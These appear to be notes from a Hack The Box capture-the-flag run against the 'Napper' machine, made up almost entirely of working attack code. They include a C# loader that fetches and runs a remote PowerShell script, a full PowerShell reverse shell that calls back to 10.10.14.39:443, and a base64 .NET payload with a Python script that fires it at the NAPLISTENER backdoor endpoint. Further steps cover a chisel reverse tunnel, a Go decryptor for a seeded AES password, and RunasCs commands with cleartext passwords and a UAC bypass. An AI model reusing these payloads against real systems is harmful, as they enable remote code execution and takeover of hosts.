HTB-Napper笔记

nmap -sC -sV -T5 -Pn  10.10.11.240

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "https://napper.htb" -H "Host: FUZZ.napper.htb" --hl 186

This means that any web request to /ews/MsExgHealthCheckd/ that contains a base64-encoded .NET assembly in the sdafwe3rwe23 parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.

using System;using System.Diagnostics;using System.Net;
namespace shell // <-- name file shell.cs{    public class Run    {        public Run()        {            var scriptUrl = "http://10.10.14.39/cxk.ps1";
            using (WebClient webClient = new WebClient())            {                // Download the PowerShell script from the URL                string scriptContent = webClient.DownloadString(scriptUrl);
                var processStartInfo = new ProcessStartInfo("powershell.exe")                {                    // Pass the downloaded script content as a command                    Arguments = scriptContent,                    RedirectStandardOutput = true,                    RedirectStandardError = true,                    UseShellExecute = false,                    CreateNoWindow = true                };
                var process = new Process                {                    StartInfo = processStartInfo                };
                process.Start();
            }        }
        public static void Main(string[] args)        {
        }    }}

do {    # Delay before establishing network connection, and between retries    Start-Sleep -Seconds 1
    # Connect to C2    try{        $TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.39', 443)    } catch {}} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
# Writes a string to C2function WriteToStream ($String) {    # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
    # Write to C2    $StreamWriter.Write($String + 'caixukun> ')    $StreamWriter.Flush()}
# Initial output to C2. The function also creates the inital empty byte array buffer used below.WriteToStream ''
# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {    # Encode command, remove last byte/newline    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)        # Execute command and save output (including errors thrown)    $Output = try {            Invoke-Expression $Command 2>&1 | Out-String        } catch {            $_ | Out-String        }
    # Write output to C2    WriteToStream ($Output)}# Closes the StreamWriter and the underlying TCPClient$StreamWriter.Close()

mcs -reference:System.ServiceProcess.dll shell.cs

base64 shell.exe

import requestsfrom urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)payload="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JAACAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAAAgAAAAKAACAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAgNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" 

hosts =["napper.htb"]form_field=f"sdafwe3rwe23={requests.utils.quote(payload)}"for h in hosts:        url_ssl= f"https://{h}/ews/MsExgHealthCheckd/"        try:                r_ssl=requests.post(url_ssl,data=form_field,verify=False)                print(f"{url_ssl} : {r_ssl.status_code}{r_ssl.headers}")        except KeyboardInterrupt:                exit()        except Exception as e:                print(e)                pass

type _o2.cfs | findstr pass

C:Tempwwwinternalcontentposts>type first-re-research.mdtype first-re-research.md---title: "**INTERNAL** Malware research notes"description: A collection of notes for the current research we might publish.date: 2023-04-22draft: false tags: [re, .NET, malware] ---
# Introduction
| Meta | Data| | --- | --- || Analyst | Ruben || Status | Initial analysis || Initial find | External Report |

The malware is a .NET sample. We are tracking the malware fond by Elastic who named it NAPLISTENER.
# What we know so far:
So it is a backdoor:
```txt[...] HTTP listener written in C#, which we refer to as NAPLISTENER. Consistent with SIESTAGRAPH and other malware families developed or used by this threat, NAPLISTENER appears designed to evade network-based forms of detection.  [...]```
In the sanbox I can't find the URL. 
```txtThis means that any web request to /ews/MsExgHealthCheckd/ that contains a base64-encoded .NET assembly in the sdafwe3rwe23 parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.````
Currently we are not sure on how to proceed. 

# Log
* 2023-04-24: Did some more reading up. We need to look for some URL and a special parameter* 2023-04-23: Starting the RE process. Not sure on how to approach. * 2023-04-22: Nothing seems to be showing up in the sandbox, i just startes and stops again. Will be testing local* 2023-04-22: Got the copy of the backdoor, running in sandbox


# Refrences
* https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph* https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener* https://www.darkreading.com/threat-intelligence/custom-naplistener-malware-network-based-detection-sleep

C:Tempwwwinternalcontentposts>

C:Tempwwwinternalcontentposts>type no-more-laps.mdtype no-more-laps.md---title: "**INTERNAL** Getting rid of LAPS"description: Replacing LAPS with out own custom solutiondate: 2023-07-01draft: true tags: [internal, sysadmin] ---
# Intro
We are getting rid of LAPS in favor of our own custom solution. The password for the `backup` user will be stored in the local Elastic DB.
IT will deploy the decryption client to the admin desktops once it it ready. 
We do expect the development to be ready soon. The Malware RE team will be the first test group. 
C:Tempwwwinternalcontentposts>

chisel server --reverse --port 1118.chisel client 10.10.14.39:1118 R:9200:127.0.0.1:9200

go run cxk.go 55645459 nSbi9PAYJr9WSAxuQe5sq3jm8odJFQd_cb6ZCeYWEFj5PVUHCY2PWbIxctw8oaUCX8SfHNM0q-w=

.RunasCs.exe backup BozRKbVkeMiNkNnotJWywpSNgwMEgHMoJkHacYns cmd.exe -r 10.10.14.39:443 --bypass-uac

package main
import (        "crypto/aes"        "crypto/cipher"        "encoding/base64"        "fmt"        "log"        "math/rand"        "os"        "strconv")
func checkErr(err error) {        if err != nil {                log.Fatal(err)        }}
func genKey(seed int) (key []byte) {        rand.Seed(int64(seed))        for i := 0; i < 0x10; i++ {                val := rand.Intn(0xfe)                key = append(key, byte(val+1))        }        return}
func decrypt(seed int, enc []byte) (data []byte) {        fmt.Printf("Seed: %vn", seed)        key := genKey(seed)        fmt.Printf("Key: %vn", key)        iv := enc[:aes.BlockSize]        fmt.Printf("IV: %vn", iv)        data = enc[aes.BlockSize:]
        block, err := aes.NewCipher(key)        checkErr(err)
        stream := cipher.NewCFBDecrypter(block, iv)        stream.XORKeyStream(data, data)        fmt.Printf("Plaintext: %sn", data)        return}
func main() {        if len(os.Args) != 3 {                return        }        seed, err := strconv.Atoi(os.Args[1])        checkErr(err)        enc, err := base64.URLEncoding.DecodeString(os.Args[2])        checkErr(err)
        decrypt(seed, enc)}

.RunasCs.exe backup dsIUMSAlEkjJDYXKeGHEfBwXeYieezlpgodWZKti "cmd /c whoami /all"